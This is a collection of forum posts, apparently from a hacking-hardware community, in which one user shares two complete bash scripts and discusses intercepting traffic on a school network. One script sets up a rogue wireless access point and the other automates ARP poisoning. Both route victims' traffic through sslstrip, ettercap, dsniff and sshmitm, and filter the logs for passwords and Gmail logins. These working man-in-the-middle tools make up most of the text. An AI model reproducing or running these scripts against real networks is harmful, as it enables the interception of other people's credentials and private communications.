Junke1990

VB used to stand for VisualBasic, possible years ago

You just made me feel old...xD

ow! I thought you were bullshitting me "i need to mount a VB to check? " mounting visual Basic? :P Thanks for the effort!

that doesn't answer my question, is it possible to detect it, yes or no, and if so, how?

My question is, is it possible to detect if a Windows (XP SP3+) Machine is locked. Regardless of the payload, I want to be able to automate more thus detect in code if it is locked. I could make 2 payloads, locked and unlocked but I would like to combine that into 1.

Windows, at least at first, do have Linux but no OSX in house

Is there an easy way to detect whether the screen is locked or not?

Thanks! Any tips/pointers I should look into while waiting on the post?

Where should the extensions go? There isn't anything about it in the https://bunnytoolkit.com/guides/ Git and docs https://github.com/hak5/bashbunny-payloads/tree/master/docs say in payload/library/extensions on the other hand the https://wiki.bashbunny.com/#!index.md guide says payload/extensions P.s. mine has been shipped about an hour ago so I can't test it out myself.

If you have any sugestions please let me know! #!/bin/bash # SoftAP for wireless-testing # Created/Modded by Junke1990 # # Hardware: Eee PC 1000h # NICs # eth0 (LAN) # ra0 (WLAN) rt2860STA # wlan1 (USB WLAN) RTL8170L # dealextreme sku.27963 # init sslstrip='/home/junke/Bureaublad/sslstrip-0.7/sslstrip.py' # services dsn=0 # Dsniff ims=0 # IMsniff msg=0 # MSGsnarf url=0 # URLsnarf ssllog1=0 # tail sslstrip.log ssllog2=0 # tail sslstrip.log |grep pass # Make sure only root can run our script if [[ $EUID -ne 0 ]]; then echo "This script must be run as root" 1>&2 exit 1 fi modprobe tun sleep 1 echo "[>] Starting: Soft AP - Junke1990" # get interface and mac list i=0 iflist=() maclist=() while read -r if mac; do iflist[i]=$if maclist[i]=$mac ((i++)) done < <(ifconfig -a | awk '/^[^ ]/ && $1 != "lo" {print $1,$5}') for i in "${!iflist[@]}"; do echo "$i: interface ${iflist[i]}, mac: ${maclist[i]}" done echo -n "[?] Select your inet conn. [#] " read j intI=${iflist[j]} # select SoftAP adapter for i in "${!iflist[@]}"; do if [ $j != $i ]; then echo "$i: interface ${iflist[i]}, mac: ${maclist[i]}" fi done echo -n "[?] Select your SoftAP adapter. [#] " read j intAP=${iflist[j]} # MAC address intAP_MAC=${maclist[j]} echo "[+] Gathering network info..." # info inet conn intI_IP=`ifconfig $intI | grep 'inet addr:'| grep -v '127.0.0.1' | cut -d: -f2 | awk '{ print $1}'` intI_DNS=`cat /etc/resolv.conf | sed -n "2 p" | awk '{ print $2}'` intI_gw=`route -n | awk '{ print $2}' | grep -v '0.0.0.0' | sed -n "3 p"` intI_mask=`ifconfig $intI | grep 'Mask:' | grep -v '0.0.0.0' | awk '{ print $4}' | cut -d: -f2` intI_netw=`route -n | grep $intI_mask | cut -d' ' -f1 | head -n 1` # converting netmask in to netmask length echo "[+] Calc'ing network mask..." NETMASK=$intI_mask MASK1=`echo ${NETMASK} | sed 's/\(.*\)\.\(.*\)\.\(.*\)\.\(.*\)/\1/'` MASK2=`echo ${NETMASK} | sed 's/\(.*\)\.\(.*\)\.\(.*\)\.\(.*\)/\2/'` MASK3=`echo ${NETMASK} | sed 's/\(.*\)\.\(.*\)\.\(.*\)\.\(.*\)/\3/'` MASK4=`echo ${NETMASK} | sed 's/\(.*\)\.\(.*\)\.\(.*\)\.\(.*\)/\4/'` BM1=`echo -e "obase=2; ${MASK1}" | bc |sed 's/0.*$//' |tr -d "\n" | wc -m` BM2=`echo -e "obase=2; ${MASK2}" | bc |sed 's/0.*$//' |tr -d "\n" | wc -m` BM3=`echo -e "obase=2; ${MASK3}" | bc |sed 's/0.*$//' |tr -d "\n" | wc -m` BM4=`echo -e "obase=2; ${MASK4}" | bc |sed 's/0.*$//' |tr -d "\n" | wc -m` MASK=$(( BM1 + BM2 + BM3 + BM4)) intI_mask_nb=$MASK # enter wireless essid name echo -n "[?] Enter the desired name for wireless network: "; read ssid # prepare interface / softap #wlanconfig $intAP destroy #wlanconfig $intAP create wlanmode mon wlandev wifi0 if [ `echo $intAP || grep 'mon' ` ]; then intAP=`airmon-ng start $intAP |grep "monitor mode " | awk '{ print $5 }' |sed 's/)//'`; fi echo "[+] Setting up fake AP..."; sleep 1; # to enable wep add: -W 1 -w "1234567890" -a $intAP_MAC xterm -geometry 75x15 -e airbase-ng -c 6 -e "$ssid" $intAP & sleep 1; ifconfig at0 up ifconfig at0 192.168.3.1 netmask 255.255.255.0 ifconfig at0 mtu 1500 route add -net $intI_netw netmask $intI_mask gw $intI_gw route add -net 192.168.3.0 netmask 255.255.255.0 gw 192.168.3.1 # monitor #xterm -e airodump-ng -c 6 --bssid $intAP_MAC $intAP & #xterm -e tshark -i 3 "not broadcast and not multicast" & # at0 = 3 echo "[+] Killing dhcpd..." # do this quiet for when the process isn't running killall -q dhcpd3 echo "[+] Setting up DHCP config..." # create custom dhcpd.conf for WLAN DHCPDCONF=''; cat > dhcpd.conf << EOF ddns-update-style ad-hoc; default-lease-time 600; max-lease-time 7200; subnet 192.168.3.0 netmask 255.255.255.0 { option subnet-mask 255.255.255.0; option broadcast-address 192.168.3.255; option routers 192.168.3.1; EOF ### Submitted by ToomSec for d in $(cat /etc/resolv.conf | sed -r 's/^.* ([0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}).*$/\1/' | grep -E '[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}') do echo "option domain-name-servers $d;" >> dhcpd.conf done cat >> dhcpd.conf << EOF range 192.168.3.10 192.168.3.254; } EOF echo "[+] Cleaning up IP tables..." # iptables cleanup iptables --flush iptables --table nat --flush iptables --delete-chain iptables --table nat --delete-chain echo "[+] Setting up forwarding tables..." # iptables #iptables -t nat -A PREROUTING -p udp -j DNAT --to $intI_gw # all udp traffic #iptables -t nat -A PREROUTING -p udp --dport 53 -j DNAT --to $intI_DNS # DNS only iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080 # send stuff to sslstrip iptables -A FORWARD --in-interface at0 -j ACCEPT # rogue gateway iptables -t nat -A POSTROUTING --out-interface $intI -j MASQUERADE # gateway to ext. router #iptables -t nat -A PREROUTING -s 192.168.3.0/24 -d $intI_netw/$intI_mask_nb -j DROP # protect LAN from WLAN # ip fwd enable echo 1 > /proc/sys/net/ipv4/ip_forward # start dhcp server for subnet # edit /etc/apparmor.d/usr.sbin.dhcp3 to allow dhcpd to read the config file if it keeps giving permission denied echo "[+] Setting up DHCP server..." xterm -geometry 75x10 -T DHCP -e dhcpd3 -d -f -cf dhcpd.conf -pf /var/run/dhcp3-server/dhcpd.pid at0 & ### python-twisted-web2 required!!! if [ -f $sslstrip ]; then echo "[+] Setting up sslstrip..." xterm -geometry 45x5 -e python $sslstrip -a -k -f -l 8080 & if [ $ssllog1 == 1 ]; then xterm -e tail -f sslstrip.log & fi if [ $ssllog2 == 1 ]; then xterm -e "tail -f sslstrip.log |grep 'pass' "& fi sleep 1 else echo "[-] SSLStrip not found..." echo 'Edit $sslstrip to the correct path.' fi # DSniff if [ $dsn == 1 ]; then if which dsniff >/dev/null; then echo "[+] Setting up dsniff..." xterm -e dsniff -i at0 -m & sleep 1 fi fi # IMSniff - MSN only if [ $ims == 1 ]; then if which imsniff >/dev/null; then echo "[+] Setting up IMSniff..." if [ ! -d 'IMlog' ]; then mkdir IMlog fi # gives a lot of unknown content err's xterm -e "imsniff -cd IMlog at0 |grep -i -v 'unknown'"& sleep 1 fi fi # MSGSnarf - AOL, ICQ, IRC, MSN, Yahoo if [ $msg == 1 ]; then if which msgsnarf >/dev/null; then echo "[+] Setting up MSGsnarf..." xterm -e msgsnarf -i at0 & sleep 1 fi fi # URLSnarf if [ $url == 1 ]; then if which urlsnarf >/dev/null; then echo "[+] Setting up URLsnarf..." xterm -e urlsnarf -i at0 & sleep 1 fi fi # ettercap TCP Ports # IMAP - 143/TCP 220/TCP (IMAP3) 993/TCP (IMAPS) # POP3 - 110/TCP 995/TCP # SMTP - 25/TCP 465/TCP # SSL - 443/TCP # HTTP - 80/TCP # SSH - 22/TCP # MSN - 1863/TCP # Yahoo - 5050/TCP - nobody interesting uses yahoo... # ICQ - 5190/TCP - nobody at all uses ICQ xD echo "[+] Setting up ettercap..." #xterm -e ettercap -T -i at0 -P autoadd -l ettercap -w ettercap.pcap -M arp /192.168.3.1/ /192.168.3.10-254/22,25,80,110,143,220,443,465,993,995,1863 & ### Submitted by ToomSec #ettercap -T -q -p -u -z -m ${LOGFOLDER}ettercap_evilap.log -i $wint >> $LOGFILE 2>&1 xterm -e ettercap -T -q -p -u -z -m ettercap_evilap.log -i at0 & sleep 1 # ip_forward # as last to avoid reset echo "[+] Enabling IP forward..." echo "1" > /proc/sys/net/ipv4/ip_forward chk=`cat /proc/sys/net/ipv4/ip_forward` if [ $chk != "1" ]; then echo "[-] Can NOT enable ip_forward..." fi echo "[x] All done! have fun!"

I honestly don't know, I'm not that big of an expert when it comes to ettercap. I did update the script to make it easier. But it is still a work in progress. I have a Soft AP script to if you want I can put it up here to, it is based on this one but has a few other feature since you are actually in the middle of the traffic.

Hey guys, Since I was getting tired of doing everything by hand I made a little script to automate the procedure xD Let me know if something is done wrong or you have suggestions! #!/bin/bash # ARP Poisoning # Created by Junke1990 # Tested with Asus eee 1000h # ### required packages ### # sudo apt-get -y install ettercap python-twisted-web2 dsniff imsniff python # sslstrip - google, download, extract and alter path below! # init sslstrip='/home/junke/Bureaublad/sslstrip-0.7/sslstrip.py' logfolder='ARP-logs/' # Make sure only root can run our script if [[ $EUID -ne 0 ]]; then echo "This script must be run as root" 1>&2 exit 1 fi modprobe tun sleep 1 # get interface and mac list i=0 iflist=() maclist=() while read -r if mac; do iflist[i]=$if maclist[i]=$mac ((i++)) done < <(ifconfig -a | awk '/^[^ ]/ && $1 != "lo" {print $1,$5}') for i in "${!iflist[@]}"; do echo "$i: interface ${iflist[i]}, mac: ${maclist[i]}" done echo -n "Select your interface to ARP poison. [#] " read j int=${iflist[j]} echo -n "IP address of victim: [x.x.x.x]/[a]" read vic # info inet conn int_IP=`ifconfig $int | grep 'inet addr:'| grep -v '127.0.0.1' | cut -d: -f2 | awk '{ print $1}'` int_gw=`route -n | awk '{ print $2}' |grep -v '0.0.0.0' | sed -n "3 p"` int_bc=`ifconfig $int | grep 'Bcast:'|cut -d: -f3 | awk '{ print $1}'` # lowest IP oct4=`echo ${int_gw} | sed 's/\(.*\)\.\(.*\)\.\(.*\)\.\(.*\)/\4/'` oct4=$((oct4+1)) int_a=`echo $int_gw | cut -d. -f1,2,3` int_a="$int_a.$oct4" # highest IP oct4=`echo $int_bc | sed 's/\(.*\)\.\(.*\)\.\(.*\)\.\(.*\)/\4/'` int_b=$((oct4-1)) # range int_range="$int_a-$int_b" # determine victim if [ $vic = "a" ]; then vic=$int_range; fi # iptables iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080 # ettercap TCP Ports # IMAP - 143/TCP 220/TCP (IMAP3) 993/TCP (IMAPS) # POP3 - 110/TCP 995/TCP # SMTP - 25/TCP 465/TCP # SSL - 443/TCP # HTTP - 80/TCP # SSH - 22/TCP # MSN - 1863/TCP # Yahoo - 5050/TCP - nobody interesting uses yahoo... # ICQ - 5190/TCP - nobody at all uses ICQ xD xterm -e ettercap -T -P autoadd -i $int -L ettercap.log -m ettercap.msg.log -l ettercap.info.log -w ettercap.pcap -M arp /$int_gw/ /$vic/22,25,80,110,143,220,443,465,993,995 & ### python-twisted-web2 required!!! if [ -f $sslstrip ]; then xterm -title sslstrip -e python $sslstrip -s -f -k -l 8080 & sleep 1 xterm -e tail -f "sslstrip.log" & sleep 1 xterm -e "tail -f sslstrip.log |grep -i 'pass' "& # filters - not fully tested! # xterm -title HYVES -e "tail -f sslstrip.log |grep 'auth_username' | sed 's/.*auth_username=/user=/' | sed 's/\&/ /g' | awk '{print $1 $2}'"& # xterm -title GMAIL -e "tail -f sslstrip.log |grep Passwd | sed 's/.*Email=/Email=/' | sed 's/\&/ /g' | awk '{print $1 $2 }'"& else echo "sslstrip not found." echo 'Edit $sslstrip to the correct path.' fi # DSniff if which dsniff >/dev/null; then xterm -e dsniff -i $int -m -w dsniff.log & fi # IMSniff - MSN only if which imsniff >/dev/null; then if [ ! -d 'IMlog' ]; then mkdir IMlog fi # gives a lot of unknown content err's xterm -e "imsniff -cd IMlog $int |grep -i -v 'unknown'"& fi # MSGSnarf - AOL, ICQ, IRC, MSN, Yahoo if which msgsnarf >/dev/null; then xterm -e msgsnarf -i $int & fi ### SINGLE VICTIM ONLY ### # SSH mitm if which sshmitm >/dev/null; then if [ $vic != "a" ]; then xterm -e sshmitm -I $vic & fi fi # ip_forward # as last to avoid reset echo "1" > /proc/sys/net/ipv4/ip_forward chk=`cat /proc/sys/net/ipv4/ip_forward` if [ $chk != "1" ]; then echo "Can't enable ip_forward" fi edit: updated the script

From where are you trying to connect to your WAN IP? I know that when I connect to my WAN IP from inside the network the traffic isn't forwarded but the router thinks it's for himself.

Hey guys, I wanted to see if I could MiTM at my school, but again and again it was unsuccessful. By simply asking the guys of IT department I now know they use a radius server with AD, but worse, DHCP snooping. So therefor I can not use the ARP poisoning or DHCP exhaustion. Best part, I've got permission to screw around with the network as much as I want since """I was such a great student thinking along with them to "solve" the security issues""" So I was thinking about setting up a Soft AP with NAT and my own Radius Server which accepts every login and logs those and with a second interface to connect to the actual network and passing the information, stripped, through. I've ordered a nice wireless card online to make sure my signal is better, http://www.dealextreme.com/details.dx/sku.27963 Any idea's or thoughts?

If an external adapter is an option. I'm the owner of an EEE 1000h, not suited for VM's but besides that, I was looking for an external WLAN adapter with a lot of power and it must be cheap. Check this one out http://www.dealextreme.com/details.dx/sku.27963 It's based on a RTL8187L chipset, I don't have it, still on it's way but the reviews of other people are well promising. Here's a nice review of the product: http://www.dealextreme.com/forums/Default....threadid.537069